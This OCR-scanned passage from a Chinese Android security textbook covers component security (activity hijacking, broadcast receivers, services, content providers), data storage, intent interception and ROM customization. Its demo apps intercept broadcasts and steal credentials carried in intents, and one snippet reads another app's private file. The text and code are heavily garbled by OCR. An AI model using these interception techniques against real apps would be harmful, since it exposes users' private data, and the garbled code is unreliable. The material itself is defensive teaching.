um 法 ， 不 过 有 个 简单 的 方法 就 是 查看 最 近 运 行 过 的 程序 列表 ， 

过 最 后 运行 的 程序 来 判断 Activity 是 否 被 劫持 过 ， 方 法 是 : 长 按 Home 键 不 
， 系 统 会 显示 最 近 运 行 过 的 程序 列表 。 如 图 11-12 所 示 ， 笔 者 在 点 击 
Browser 应 用 后 ， 最 近 运 行 过 的 程序 列表 中 ，HijackActivity 却 显示 在 了 最 前 
面 ， 很 显然 这 个 程序 有 劫持 Activity 的 嫌疑 。 
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图 11-12 ”查看 最 近 运 行 过 的 程序 


这 种 检测 Activity 动 持 的 方法 也 不 是 在 任何 时 候 都 有 效 的 ， 在 声明 
Activity 时 ， 如 果 设 置 属性 android:excludeFromRecents 的 值 为 tue， 程 序 在 运 
行 时 就 不 会 显示 在 最 近 运 行 过 的 程序 列表 中 ， 上 面 的 检测 方法 自然 也 就 失 
效 了 。 


11.4.2 Broadcast Receiver 安 全 


Broadcast Receiver 中 文 被 称 为 广播 接收 者 ， 用 于 处 理 接收 到 的 广播 ， 广 
播 接收 者 的 安全 分 为 发 送 安 全 与 接收 安全 两 个 方面 。 


Android 系 统 中 的 广播 有 个 特点 : 多 数 情况 下 广播 是 使 用 Action 来 标识 
其 用 途 ， 然 后 由 sendBroadcast0 方 法 发 出 的 ， 系 统 中 所 有 响应 该 Action 的 广 
播 接收 者 都 能 够 接收 到 该 广播 。 在 AndroidManifest,xml 中 ， 组 件 的 Action 是 
通过 Intent 过 滤器 (intent-filter) 来 设置 的 ， 使 用 了 Intent 过 滤器 的 Android 组 
件 默 认 情 况 下 都 是 可 以 被 外 部 访问 的 ， 这 个 安全 问题 在 11.3.2 节 的 串 谋 攻 击 
中 已 经 演示 了 ， 解 决 方法 就 是 在 组 件 声明 时 设置 它 的 android:exported 属 性 为 
false， 让 广播 接收 者 只 能 接收 本 程序 组 件 发 出 的 广播 。 

下 面 我 们 重点 要 谈 的 是 广播 接收 者 的 发 送 安 全 问题 。 我 们 先 来 看 一 段 
广播 发 送 代码 。 

Intent intent = new Intent(); / /创建 Intent 对 象 

intent.setAction("com.droider.workbroadcast"); 

intent.putExtra("data", Math.random()); / /使 用 随机 值 模拟 后 台 软 件数 据 

sendBroadcast (intent); // 发 送 广播 

这 样 的 代码 我 想 很 多 读者 不 会 感到 阳 生 ， 这 段 代 码 发 送 了 一 个 Action 为 
com.droiderworkbroadcast 的 广播 。 我 们 先 来 看 看 广播 接收 者 是 如 何 响应 广 
播 接收 的 ，Android 系 统 提供 了 两 种 广播 发 送 方 法 ， 分 别 是 sendBroadcast() 与 
sendOrderedBroadcast()。 sendBroadcast() 用 于 发 送 无 序 广播 ， 无 序 广播 能 够 
被 所 有 的 广播 接收 者 接收 ， 并 且 不 能 被 abortBroadcast() 中 止 ， 
sendOrderedBroadcast() 用 于 发 送 有 序 广播 ， 有 序 广播 被 优先 级 高 的 广播 接收 
者 优先 接收 ， 然 后 依次 向 下 传递 ， 优 先 级 高 的 广播 接收 者 可 以 算 改 广播 ， 
或 者 调用 abortBroadcast() 中 止 广播 。 广 播 优 先 级 响应 的 计算 方法 是 : 动态 注 
册 的 广播 接收 者 比 静 态 广 播 接 收 者 的 优先 级 高 ， 静 态 广 播 接收 者 的 优先 级 
根据 设置 的 android:priority 属 性 的 数值 决定 ， 数 值 越 大 ， 优 先 级 越 高 ， 优 先 
级 最 大 取 值 为 1000。 

运行 本 小 节 的 实例 BroadcastReceiver， 点 击 “ 开 始 广 播 ” 按 钮 后 ， 程 序 会 
使 用 sendBroadcast() 每 5 秒 发 出 一 条 广播 ，DataReceiver 在 接收 到 广播 后 会 弹 
出 接收 到 的 广播 数据 ， 效 果 如 图 11-13 所 示 。 
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正常 广播 接收 者 程序 


到 的 数据 :0.4807230404428836 


图 11-13 ”广播 接收 者 


实例 程序 想 要 完成 的 功能 是 在 自己 的 组 件 之 间 通 过 广播 进行 数据 传 
递 ， 发 送 的 内 容 并 不 想 让 第 三 方程 序 获得 ， 但 现实 情况 下 这 样 的 实现 方式 
并 不 安全 。 现 在 运行 本 小 节 的 实例 StealBroadcastReceiver， 该 实例 动态 注册 
了 一 个 Action 为 com.droider.workbroadcast 的 广播 接收 者 ， 并 且 拥 有 最 高 的 优 
先 级 ， 程 序 在 运行 时 就 优先 接收 到 了 BroadcastReceiver 实 例 发 送 的 广播 ， 如 
图 11-14 所 示 。 


5 H & 8:24 
Broadcast Receiver 安 全 演示 程序 


pm ma ny mg prag pun rgo pw oe mmy 
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偷 奇 到 的 数据 :0.8457389434744207 


图 11-14 ”StealBroadcastReceiver 实 例 优 先 接收 到 广播 


由 于 是 使 用 sendBroadcast() 发 送 的 广播 ， 因 此 无 法 通过 abortBroadcast() 
中 止 ， 只 能 够 优先 响应 BroadcastReceiver 实 例 发 送 的 广播 ， 但 如 果 程 序 中 使 
FB B3 Æ sendOrderedBroadcast() 发 送 广播 ， 那 危害 可 就 大 了 ， 很 有 可 能 
BroadcastReceiver 实 例 永 远 都 无 法 收 到 自己 发 出 的 广播 ! 

下 面 来 看 看 解决 方案 。 发 送 广播 时 可 以 通过 Intent 指 定 具 体 要 发 送 到 的 
Android 组 件 或 类 ， 例 如 本 实例 在 创建 广播 Pntent 时 ， 加 入 下 面 这 行 代码 ， 广 
播 将 永远 只 能 被 本 实例 的 DataReceiver 接 收 。 

intent.setClass(MainActivity.this, DataReceiver.class); 


11.4.3 ”Service 安 全 


Service 组 件 是 Android 系 统 中 的 后 台 进 程 组 件 ， 主 要 的 功能 是 在 后 台 进 
行 一 些 耗 时 的 操作 。 与 其 它 的 Android 组 件 一 样 ， 当 声明 Service 时 指定 了 
Intent 过 滤器 ， 该 Service 默 认 就 可 以 被 外 部 访问 。 可 以 访问 的 方法 有 。 

startService(): 启动 服务 ， 可 以 被 用 来 实现 串 谋 攻击 。 

bindService(): 绑 定 服务 ， 可 以 被 用 来 实现 串 谋 攻 击 。 

stopService(): 停止 服务 ， 对 程序 功能 进行 恶意 破坏 。 

串 谋 攻 击 前 面 已 经 介绍 过 了 ， 本 小 节 就 不 再 给 出 实例 程序 了 。 而 对 于 
恶意 的 stopService()， 程 序 是 深恶痛绝 的 ， 它 破解 程序 的 执行 环境 ， 直 接 影 
响 到 程序 的 正常 运行 ， 要 想 杜绝 Service 组 件 被 人 恶意 的 启动 或 停止 ， 就 需 
要 使 用 Android 系 统 的 权限 机 制 来 对 调用 者 进行 控制 。 如 果 Service 组 件 不 想 
被 程序 外 的 其 它 组 件 访问 ， 可 以 直接 设置 它 的 android:exported 属 性 为 false， 
如 果 是 同一 作者 的 多 个 程序 共享 使 用 该 服务 ， 则 可 以 使 用 自 定 义 权限 ， 例 
如 下 面 的 服务 声明 。 


«service android:name-".MyService" 
android:permission-"droider.permission.ACCESS MYSERVICE"-» 
«intent-filter > 

«action android:name-"android.intent.droider.MyService"/» 
«/intent-filter» 


«/service» 

这 样 声明 的 MyService 服 务 ， 被 外 部 程序 调用 时 ， 系 统 就 会 检查 调用 者 
的 权限 ， 如 果 没 有 指定 droider.permission.ACCESS_MYSERVICE 权 限 ， 就 会 
抛 出 一 个 SecurityException 异 常 ， 导 致 程序 退出 。 


11.4.4 Content Provider 安 全 


Content Provider 中 文 称 为 内 容 提供 者 ， 它 用 于 程序 之 间 的 数据 交换 。 
Android 系 统 中 ， 每 个 应 用 的 数据 库 、 文 件 、 资 源 等 信息 都 是 私有 的 ， 其 它 
的 程序 无 法 访问 ， 如 果 想 要 访问 这 些 数 据 ， 就 必须 提供 一 种 程序 之 间 数 据 
的 访问 机 制 ， 这 就 是 Content Provider 的 由 来 ，Content Provider 通 过 提供 存储 


与 查询 数据 的 接口 来 实现 进程 之 间 的 数据 共享 ， 例 如 系统 中 的 电话 湾 、 短 
言 息 我 们 在 程序 中 都 是 通过 Content Provider 来 访问 的 。 
一 个 典型 的 Content Provider 的 声明 如 下 。 
<provider 
android:name-"com.droider.myapp.FileProvider" 
android:authorities-"com.droider.myapp.fileprovider" 
android:readPermission-"droider.permission.FILE READ" 
android:writePermission-"droider.permission.FILE WRITE" » 
«/provider» 
Content Provider 提 供 了 insert()、delete()、update()、query() 等 操作 ， 其 
中 执行 query() 查 询 操 作 时 会 进行 读 权限 android:readPermission 检 查 ， 其 它 的 
操作 会 进行 写 权 限 android:writePermission 检 查 ， 权 限 检 查 失 败 时 会 抛 出 
SecurityException 异 常 。 对 于 很 多 开发 人 员 来 说 ， 在 声明 Content Provider 时 
几乎 从 来 不 使 用 这 两 个 权限 ， 这 就 导致 了 串 谋 攻 击发 生 的 可 能 。 部 分 网 络 
软件 开发 商 使 用 Content Provider 来 实现 软件 登录 、 用 户 密码 修改 等 敏感 度 极 
高 的 操作 ， 然 而 声明 的 Content Provider 却 没有 权限 控制 ， 这 使 得 一 些 恶 意 软 
件 无 需 任何 权限 就 可 以 获取 用 户 的 敏感 信息 。 


11.5 ”数据 安全 


Android 手 机 中 存放 着 许多 与 用 户 个 人 相关 的 数据 ， 例 如 : 手机 号 码 、 
通讯 录 、 短 信息 、 聊 天 记录 、 电 子 邮 件 、 网 络 软件 的 账号 密码 等 等 。 这 些 
数据 都 是 用 户 的 隐私 ， 是 神圣 而 不 可 侵犯 的 ， 然 而 在 现实 中 ， 这 些 数 据 的 
存储 并 没有 我 们 想象 的 那么 安全 。 本 节 我 们 主要 从 编程 的 角度 出 发 ， 来 看 
看 数据 安全 问题 是 怎么 产生 的 。 


11.5.1 ”外 部 存储 安全 


数据 安全 的 首 个 安全 问题 就 是 数据 的 存储 ， 用 户 的 隐私 数据 处 理 的 不 
好 ， 就 会 暴露 给 系统 中 所 有 的 软件 ， 这 是 最 不 应 该 却 经 常 发 生 的 事情 。 


Android SDK 中 提供 了 一 种 最 简单 的 数据 存储 方式 。 那 就 是 外 部 存储 ， 外 部 
存储 是 所 有 存储 方式 中 安全 隐患 最 大 的 ， 任 何 软件 只 需要 在 
AndroidManifest.xml 中 声明 如 下 一 行 权 限 ， 就 可 以 读 写 外 部 存储 设备 。 
<uses-permission android:name="android.permission.WRITE EXTERNAL STORAGE"/> 
外 部 存储 的 方式 是 直接 使 用 File 类 在 外 部 存储 设备 上 读 写 文件 ， 例 如 在 
SD 内 存 卡 上 创建 一 个 config.txt 文 件 ， 并 往 其 中 写 入 “Hello World” 的 代码 如 
下 。 


File configFile = new File("/sdcard/config.txt"); 

FileOutputStream os; 

try ( 

os - new FileOutputStream(configFile); 
os.write("Hello World".getBytes()); 
os.close(); 

) catch (Exception e) ( 

e.printStackTrace(); 

) 

对 于 上 面 生 成 的 config.txt 文 件 ， 其 它 软 件 只 要 拥有 内 存 卡 读 写 权限 ， 就 
可 以 访问 它 的 内 容 。 正 如 您 所 看 到 的 ， 外 部 存储 的 数据 是 完全 暴露 的 ， 这 
就 给 很 多 恶意 的 软件 留 下 了 获取 其 它 软件 数据 的 可 乘 之 机 。 国 内 有 些 IM 软 
件 ， 较 早 的 版 本 中 聊天 记录 就 是 存放 在 外 部 SD 卡 上 的 ， 而 且 数 据 也 没有 加 
密 ， 这 就 是 典型 的 由 第 三 方 软件 造成 的 隐私 泄露 。 

面 对 这 个 问题 ， 笔 者 在 此 建议 ， 对 于 不 涉及 用 户 隐 私 的 数据 ， 可 以 适 
当地 采用 外 部 存储 来 保存 ， 但 只 要 涉及 到 用 户 隐私 的 ， 哪 怕 是 数据 经 过 加 
密 了 ， 也 最 好 不 要 放 到 外 部 存储 设备 上 ， 因 为 分 析 人 员 要 是 掌握 了 软件 数 
据 的 解密 方法 ， 同 样 可 以 简单 地 获取 用 户 隐私 。 


11.5.2 ”内 部 存储 安全 


其 次 是 内 部 存储 ， 它 是 所 有 软件 存放 私有 数据 的 地 方 。Android SDK 
提供 了 openFileInput( 与 openFileOutput() 方 法 来 读 写 程序 的 私有 数据 目录 。 


一 段 常见 的 使 用 内 部 存储 保存 数据 的 代码 如 下 。 


try { 
FileOutputStream fos = openFileOutput("config.txt", MODE PRIVATE); 
fos.write("Hello World".getBytes()); 
fos.close(); 

) catch (Exception e) ( 
e.printStackTrace(); 


) 

openFileOutput() 方 法 的 第 2 个 参数 指定 了 文件 创建 的 模式 ， 如 果 指 定 为 
MODE_PRIVATE， 表 明 该 文件 不 能 够 被 其 它 程序 访问 ，Android 系 统 又 是 如 
何 控 制 上 面 生 成 的 config.txt 不 能 被 其 它 程序 访问 的 呢 ? 下 面 我 们 进入 adb 
shell 中 看 看 config.txt 文 件 的 权限 。 如 图 11-15 所 示 ，config.txt 文 件 属于 app_45 
用 户 ， 并 且 只 能 被 app_45 用 户 组 与 自身 进行 读 写 操作 。Android 系 统 为 每 个 
程序 分 配 了 一 个 独立 的 用 户 与 用 户 组 ， 因 此 可 以 看 出 ，Android 内 部 存储 的 
访问 是 通过 Linux 文 件 访问 权限 机 制 控制 的 。 


ci C:XWINDOWSXsystem32Xcmd. exe — adb shell 


Microsoft Windows XP [版 本 5.1.26001] 
«C» RIPT 1985-2001 Microsoft Corp. 


C:\Documents and Settings Midministrator»adb shell 
H cd /data/data/com.droider.writeinternalstorage/files 
icd /data/data/com.droider.uriteinternalstorage/files 


— app. 45 app. 45 11 2012-18-16 18:803 config.txt 


图 11-15 ”config.txt 的 文件 权限 


下 面 尝 试 将 MODE_PRIVATE 更 改 为 MODE_WORLD_READABLE， 然 


后 在 命令 提示 符 下 查看 其 文件 权限 。 如 图 11-16 所 示 ， 文 件 允 许 其 它 用 户 进 
行 读 操 作 。 


c C:XWINDOWSXsystem32Vcmd. exe — adb shell 


C:\Documents and Settings Vidministrator»adb shell 

# cd /data/data/com.droider.writeinternalstorage/files 

icd /data/data/com.droider.writeinternalstorage/files 

# ls -1 

ls -1 

ru-ru app 45 app. 45 11 2012-10-16 10:803 config.txt 
# ls -1 

ls -1 

—ru-ru-r-- app 45 app. 45 11 2012-10-16 18:11 config.txt 
# 


图 11-16 ”config.txt 的 文件 权限 


当 内 部 存储 文件 可 以 被 外 部 访问 时 ， 可 以 使 用 以 下 代码 来 获取 它 的 内 


Context context = createPackageContext ("com.droider.writeinternalstorage", 
Context.CONTEXT IGNORE SECURITY); 
FilelnputStream fis - context.openFileInput("config.txt"); 
StringBuffer sb-new StringBuffer(); 
BufferedReader br - new BufferedReader(new InputStreamReader(fis)); 
String data - null; 
while((data = br.readLine()) != null) ( 
sb.append (data); 
) 
fis.close(); 
Toast.makeText(MainActivity.this, sb.toString(), Toast.LENGTH SHORT). 
show(); 
) catch (Exception e) ( 
e.printStackTrace(); 


) 

createPackageContext() 方 法 允许 程序 创建 其 它 程 序 包 的 上 下 文 (Context 
HR) ， 通 过 这 个 Context， 可 以 启动 其 它 程序 的 Activity、 访 问 其 它 程序 的 
私有 数据 。 但 前 提 条 件 是 ， 其 它 程序 赋予 了 相应 的 权限 ， 不 会 引发 安全 异 
常 。Context.CONTEXT_IGNORE_SECURITY 指 定 忽略 创建 Context 时 的 安 
全 异常 ， 始 终 创建 Context 对 象 。 

从 上 面 可 以 看 出 ， 使 用 openFileOutputO 创 建文 件 时 ， 第 2 个 模式 参数 是 
引发 安全 隐患 的 关键 。 很 多 读者 可 能 会 说 : 我 在 使 用 这 个 方法 时 ， 都 是 使 
用 MODE_PRIVATE 模 式 来 创建 文件 的 ， 你 所 说 的 安全 隐患 对 我 来 说 完全 不 


存在 。 其 实 ， 永 远 不 要 忽略 了 ， 程 序 可 能 通过 其 它 途 径 获 取 高 访问 权限 ， 
也 有 可 能 通过 系统 漏洞 提升 进程 权限 ， 用 户 的 手机 也 有 可 能 已 经 ROOT， 这 
些 情况 下 恶意 程序 都 能 够 访问 到 软件 内 部 存储 的 数据 。 

Shared Proferences 与 Sqlite 数 据 库 同 样 都 属于 内 部 存储 的 范畴 ， 只 是 在 
表现 形式 上 不 同 而 已 。 它 们 的 安全 问题 与 直接 使 用 内 部 文件 存储 的 安全 问 
题 是 一 样 的 。 

笔者 在 此 提醒 广大 的 软件 开发 人 员 ， 无 论 采 用 什么 样 数据 存储 方式 ， 
存储 用 户 隐 私 数据 时 都 要 进行 加 密 ， 如 果 掉 以 轻 心 ， 就 有 可 能 造成 用 户 隐 
私 的 泄漏 。 


11.5.3 ”数据 通信 安全 


数据 通信 安全 是 指 软 件 与 软件 ， 软 件 与 网 络 服务 器 之 间 进 行 数据 通信 
时 ， 所 引发 的 安全 问题 。 

首先 是 软件 与 软件 的 通信 ，Android 系 统 中 的 4 大 组 件 是 通信 的 主要 手 
段 ， 而 通信 过 程 中 ， 数 据 的 传递 就 是 依靠 Intent 来 完成 。Intent 能 够 传递 所 有 
基础 类 型 与 支持 序列 化 类 型 的 数据 ， 往 Intent 中 添加 数据 是 通过 Intent 类 的 
putExtra() 方 法 来 完成 的 。 例 如 本 小 节 实 例 saveInfo 中 有 如 下 代码 。 


Intent intent = new Intent(); / /创建 Intent 对 象 
intent.setAction("com.droider.saveinfo"); //Action 
intent.putExtra("username", "droider"); // 用 户 名 
intent.putExtra("password", "123456"); / /密码 
startService (intent); / /启动 服务 处 理 用 户 名 与 密码 
sendBroadcast(intent); / /发 送 广 播 处 理 用 户 名 与 密码 


这 段 代 码 中 通过 Intent 传 递 了 需要 保存 的 用 户 名 与 密码 ， 然 后 分 别 通过 
本 程序 的 Service、Broadcast Receiver 进 行 保存 处 理 。 理 想 情 况 下 ， 运 行 实例 
程序 后 ， 效 果 如 图 11-17 所 示 (所 有 组 件 只 是 输出 了 接收 到 的 用 户 名 与 密码 
信息 六 5 


tion [Console WY Loatat 23 


E PID TID Tag Text 
D 118064 18064 com.droider.saveinfo SaveInfoService:droider -> 123456 
D 118064 lan64 com.droider.saveinfo SavelnfoReceiver:droider -> 123456 


图 11-17 程序 处 理 了 用 户 名 密码 保存 请 求 


然而 ， 由 于 Intent 中 没有 明确 指定 目的 组 件 的 名 称 ， 导 致 Intent 中 的 数据 
可 能 被 第 三 方程 序 * 偷 窃 ”。 接 下 来 先 运行 本 小 节 的 stealInfo 实 例 ， 然 后 再 运 
行 saveInfo 实 例 ， 神 奇 的 一 幕 发 生 了 ， 如 图 11-18 所 示 ，Intent 的 数据 被 
stealInfo 截 获 了 。 


tion Console aD LogCat X 
E PID TID Tag Text 
D l2z1261 2l261 com.droider.stealinfo SteallnfoService:droider -> 123456 
D lzlz61 21261 com.droider.stealinfo StealInfoReceiver:droider -> 123456 


11-18 ”stealInfo 截 获 了 Intent 数 据 


虽然 saveInfo 实 例 中 有 处 理 Action 为 “com.droider.saveinfo” 的 服务 与 广播 
接收 者 组 件 ， 但 由 于 启动 组 件 时 没有 指定 具体 的 组 件 名 称 ， 而 系统 中 又 同 
时 存在 多 个 处 理 该 Action 的 组 件 ， 此 时 Android 系 统 就 会 选择 去 启动 优先 级 
最 高 的 组 件 ， 最 先 启 动 的 程序 其 组 件 拥有 更 高 的 优先 权 ， 这 也 就 是 为 什么 
Intent 会 被 外 部 的 stealInfo 了 响应 的 原因 。 

这 个 安全 问题 在 讲解 Broadcast Receiver 组 件 安全 时 曾经 讲 过 ，Broadcast 
Receiver 由 于 其 自身 的 特殊 性 ， 使 用 sendBroadcast0 传 递 的 Intent 本 身 就 是 暴 
圳 的， 可 以 被 其 它 程序 获取 。 因 此 ， 它 的 安全 问题 是 显而易见 的 ， 更 多 的 
问题 可 能 是 响应 优先 级 的 争夺 。 而 其 它 的 组 件 就 不 同 了 ， 传 递 的 Intent 数 据 
可 能 不 希望 被 其 它 程序 截获 ， 但 如 果 在 编写 代码 时 采用 上 面 的 方法 来 使 用 
Intent， 那 势必 会 造成 潜在 的 安全 隐患 。 

接 下 来 是 软件 与 网 络 服务 器 的 通信 。 这 样 的 情况 在 编写 网 络 软件 程序 
时 会 经 常 遇 到 : 软件 注册 时 提交 用 户 注册 信息 、 软 件 登 录 验 证 、 聊 天 消息 


传递 等 。 同 样 的 ， 这 些 信息 也 是 用 户 的 隐私 ， 在 进行 效 据 传送 时 需要 谨慎 
处 理 。 

网 络 效 据 通 信 可 能 面 临 的 攻击 是 网 络 嗅 探 ， 如 果 网 络 上 传送 的 数据 未 
经 过 加 密 ， 网 络 噢 探 软 件 截 获 到 的 数据 中 ， 就 有 可 能 包含 用 户 的 一 些 明 文 
隐私 数据 〈 例 如 网 银 账号 与 密码 ) ， 这 样 产生 的 后 果 是 难以 想象 的 。 因 为 
网 络 数据 没有 加 密 而 造成 的 用 户 损失 事件 时 有 发 生 ， 前 段 时 间 ， 看 雪 安 全 
论坛 上 就 有 人 爆 出 ， 国 内 某 聊天 软件 在 申请 账号 时 ， 提 交 的 注册 信息 未 经 
过 任何 加 密 ， 在 笔者 看 来 ， 这 不 是 编程 人 员 能 力 不 足 ， 也 不 是 服务 器 条 件 
无 法 达到 ， 而 是 由 于 开发 人 员 或 者 公司 本 身 对 安全 的 不 重视 造成 的 。 

天 于 网 络 数据 如 何 加 密 ， 笔 者 在 此 也 没有 太 多 的 建议 ， 网 络 数据 安全 
不 仅 是 Android 系 统 上 才 有 的 ， 从 第 一 款 网 络 嗅 探 软 件 诞 生 的 那天 起 ， 这 个 
问题 就 一 直 存 在 。 经 过 多 年 的 经 验 积 累 ， 很 多 公司 都 有 了 一 套 成 熟 的 网 络 
数据 传送 协议 与 加 密 方案 ， 笔 者 在 此 提出 这 个 安全 问题 的 目的 ， 一 方面 是 
给 没有 认识 到 网 络 数据 安全 的 新 手提 个 醒 ， 另 一 方面 是 希望 那些 目前 仍然 
使 用 明文 传输 数据 、 且 有 能 力 解 决 这 个 问题 的 公司 ， 认 真 做 好 数据 加 密 工 
作 ， 不 要 置 用 户 的 隐私 安全 于 不 顾 。 


11.6 ROM 安全 


什么 是 ROM? ROM 是 英文 Read only Memory 的 首 字母 缩写 ， 意 思 为 只 
读 存 储 器 。 手 机 ROM 指 的 是 存放 手机 固件 代码 的 存储 器 ， 可 以 理解 为 手机 
的 “系统 ”"， 类 似 于 Windows 系 统 安装 光盘 。 所 谓 固件 是 指 固化 的 软件 ， 英 文 
为 frmware。 通 过 完成 把 某 个 系统 程序 写 入 到 特定 的 硬件 系统 中 的 
FlashROM 这 一 过 程 ， 这 个 系统 程序 就 变 成 了 固件 。FlashROM， 即 快速 擦 
写 只 读 编 程 器 ， 也 就 是 我 们 常 说 的 “内 存 ”。 爱 的 鼓 Android 手 机 的 人 通常 都 
有 一 个 爱好 ， 那 就 是 寻找 ROM 与 刷机 。 本 节 我 们 来 看 看 ， 网 络 上 这 些 优化 
版 、 美 化 版 的 ROM， 都 存在 着 一 些 什么 样 的 安全 问题 。 


11.6.1 ROM 的 种 类 


根据 ROM 制 | 作者 不 同 ，Android 系 统 的 ROM 分 为 如 下 三 类 。 

e 官方 ROM 

官方 ROM 是 指 手机 出 厂 时 被 刷 入 的 ROM。 通 常人 们 的 理解 是 : 官方 
的 ， 总 是 最 好 的 。 然 而 实际 上 并 非 如 此 ， 由 于 国情 与 一 些 其 它 的 因素 ， 
内 购买 的 正版 的 Android 手 机 (又 称 国 行 机 ) 远 远 没有 想象 的 那么 好 ， 抛 开 
手机 质量 与 夸大 其 词 的 配置 不 说 ， 就 系统 中 集成 的 软件 就 是 让 人 难以 接受 
的 。 通 常 ， 一 部 国 行 机 入 手 后 ， 里 面 会 塞 满 了 各 种 乱七八糟 的 软件 ， 这 些 
软件 是 软件 开发 商 与 手机 厂商 合作 植 入 的 ， 大 多 数 对 用 户 没有 实际 用 途 ， 
更 没有 存在 的 价值 ， 然 而 这 些 软件 都 属于 系统 程序 ， 用 户 无 法 卸载 ， 用 户 
为 了 求 个 清静 ， 只 能 选择 ROOT 手机 来 删除 它们 ， 但 问题 也 由 此 出 来 了 ， 手 
机 ROOT 后 安全 风险 陡 增 ， 手 机 厂商 拒绝 保修 等 。 最 终 的 结论 是 : 官方 的 ， 
未 必 是 最 好 的 。 

e 第 三 方 ROM 

第 三 方 ROM 是 指 由 第 三 方 ROM 制 作 团队 或 广 商 制作 的 ROM。 目 前 第 三 
方 ROM 制 作 团队 影响 力 最 大 的 要 数 国 外 的 CyanogenMod 团 队 (以 下 简称 CM 
团队 ) ， 该 团队 成 立 于 2009 年 ， 专 注 Android 系 统 的 ROOM 制作 ， 该 团队 制作 
的 ROOM 无 论 质 量 上 、 还 是 数量 上 ， 都 是 其 它 ROM 矿 商 或 团队 无 法 比拟 的 。 
CM 团队 出 品 的 ROM 以 数字 命名 ， 目 前 最 新 的 Android 4.1 命 名 为 CM 10， 读 
者 可 以 从 以 下 网 站 获取 CM 的 更 多 信息 : http://www.cyanogenmod.com。 

e 民间 个 人 版 ROM 

民间 个 人 版 ROM 是 指 个 人 在 官方 ROM 或 第 三 方 ROM 的 基础 上 进行 修改 
而 成 的 ROM。 在 国内 ， 有 个 奇怪 的 现象 就 是 民间 个 人 版 ROM 比 第 三 方 ROM 
更 受 追 捧 ， 然 而 ， 往 往 也 是 这 些 民间 ROM， 给 用 户 带 来 了 巨大 的 经 济 损 
失 。 


11.6.2 ROM 的 定制 过 程 


正如 前 面 介绍 的 官方 ROM 的 诸多 问题 ， 很 多 人 在 选 购 Android 手 机 时 ， 
不 愿意 购买 国 行 手机 ， 而 是 通过 网 络 或 其 它 渠 道 购 买 * 日 行 机 ”、“ 港 行 机 ”， 


然后 自己 寻找 中 意 的 ROM 来 刷机 。 尽 管 官方 的 ROM 最 稳定 ， 同 时 也 是 最 安 
全 的 ， 但 用 户 通常 在 有 多 个 选择 时 不 会 去 考虑 它 。 

ROM 的 制作 可 以 是 基于 Android 源 码 的 修改 ， 也 可 以 是 基于 官方 ROM 
的 改造 。 直 接 编译 的 Android 源 码 通常 在 用 户 的 手机 上 是 无 法 运行 的 ， 因 为 
缺少 与 手机 硬件 相关 的 驱动 程序 ， 然 而 驱动 程序 是 手机 厂商 的 商业 机 密 ， 
通常 是 不 会 开源 的 ， 因 此 ， 实 际 的 ROM 制 作 多 是 基于 Android 的 源码 与 手机 
官方 ROM 中 提供 的 驱动 程序 来 制作 的 ，CM 团 队 就 是 这 么 干 的。 

随 着 Android 系 统 的 普及 ， 使 用 Android 手 机 的 用 户 越 来 越 多 ， 用 户 对 
ROM 的 需求 也 越 来 越 明 显 。 俗 话说 ， 有 需求 就 会 有 有 市场， 国内 外 很 多 公司 
看 准 了 这 个 商机 ， 纷 纷 投 入 到 ROM 的 制作 中 来 。 以 国内 市 场 来 说 ， 最 大 的 
问题 是 技术 水 平 ， 修 改 Android 系 统 源码 不 是 一 个 普通 技术 员 能 够 办 到 的 事 
情 ， 这 涉及 到 很 多 系统 底层 的 知识 ， 以 及 对 Android 系 统 架构 的 了 解 。 再 
者 ， 市 场 上 的 Android 手 机 品牌 与 型 号 林林总总 ， 每 一 款 手 机 都 有 自己 的 特 
点 ， 使 用 不 同 的 硬件 配置 ， 即 使 是 同一 厂家 生产 的 同一 系列 的 手机 ， 也 无 
法 保证 其 ROM 的 兼容 性 ， 这 就 是 Android 系 统 的 一 个 大 问题 : 碎片 化 。 

碎片 化 问题 加 大 了 软件 开发 人 员 与 ROM 制 作者 的 开发 成 本 ， 制 约 了 
Android 系 统 的 发 展 ， 机 型 的 适 配 可 能 会 让 ROM 制 作 团队 面临 着 一 个 窘 态 : 
那 就 是 每 制作 一 款 相 应 手机 的 ROOM 时， 就 不 得 不 购置 一 台 该 型 号 的 手机 ， 
最 后 的 场景 是 制作 ROM 的 团队 看 上 去 更 像 是 卖 手 机 的 。 当 然 ， 笔 者 在 此 只 
是 戏说 ， 对 于 大 型 团队 来 说 ， 这 点 制作 成 本 还 是 能 够 接受 的 ， 不 过 对 于 个 
人 ROM 制 作者 来 说 ， 就 是 一 笔 不 小 的 开支 了 。 

为 了 尽 可 能 的 将 成 本 降 到 最 低 ， 国 内 的 ROM 制 作 广 商 与 个 人 都 选择 了 
在 第 三 方 ROM 的 基础 上 进行 改造 。 这 样 做 的 好 处 是 : 减少 了 制作 与 测试 的 
成 本 。 一 款 稳定 的 ROM， 从 制作 到 测试 都 是 需要 花费 大 量 的 时 间 与 精力 
的 ， 如 果 一 切 从 头 开始 ， 势 必 会 给 ROM 制 作 团队 带 来 巨大 的 开支 ， 对 于 市 
场 经 济 下 急功近利 的 厂商 、 抄 袭 成 性 的 IT 市 场 来 说 ， 白 手 起 家 无 疑 是 一 种 
“ 恩 蠢 ”的 行为 。 众 说 周知 ，CM 团 队 的 ROM 在 发 布 前 都 经 过 了 严格 的 测试 ， 
其 稳定 性 是 毋庸 置疑 的 ， 而 且 CM 团 队 的 ROM 是 开源 的 ， 因 此 ， 国 内 很 多 
ROM 厂 商都 将 CM 团 队 的 ROM 作 为 基础 ， 进 行 二 次 开发 。 


民间 个 人 版 的 ROM 在 多 数 情 况 下 ， 不 会 对 ROM 进 行 大 幅度 的 修改 ， 它 
们 只 是 在 已 有 有 ROM 的 基础 上 进行 微调 。 民 间 个 人 版 的 ROM 在 国内 拥有 着 不 
可 小 虞 的 市 场 ， 在 各 大 知名 的 Android 手 机 论坛 上 ， 充 斥 着 各 种 优化 版 、 美 
化 版 的 ROM， 下 面 我 们 来 看 看 这 些 民间 个 人 版 ROM 是 如 何 被 生产 出 来 的 。 
通常 民间 个 人 版 的 ROM 的 制作 会 进行 如 下 几 道 工序 : 

1. ROM 解 包 

2. ROM 修 改 

3. ROM 打 包 

下 面 我 们 来 分 别 看 看 这 每 一 道 工 序 都 做 了 什么 。 

e ROM 人 解 包 

个 人 用 户 大 多 数 不 具 备 专业 的 Android 软 件 开发 知识 ， 他 们 的 工作 都 是 
基于 官方 ROM 或 第 三 方 ROM 的 修改 ， 而 修改 ROM 的 第 一 步 就 是 对 已 有 的 
ROM 进 行 解 包 。 

根据 手机 刷机 方式 的 不 同 ， 可 以 分 为 线 刷 与 卡 刷 两 种 。 线 刷 是 指使 用 
